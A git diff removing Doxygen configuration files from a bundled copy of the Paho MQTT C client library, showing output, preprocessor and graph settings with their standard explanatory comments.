-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal
deleted file mode 100644
index 5823639..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal
+++ /dev/null
@@ -1,1851 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "MQTT C Client Libraries Internals"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "../doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "../build/output/doc/MQTTClient_internal/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
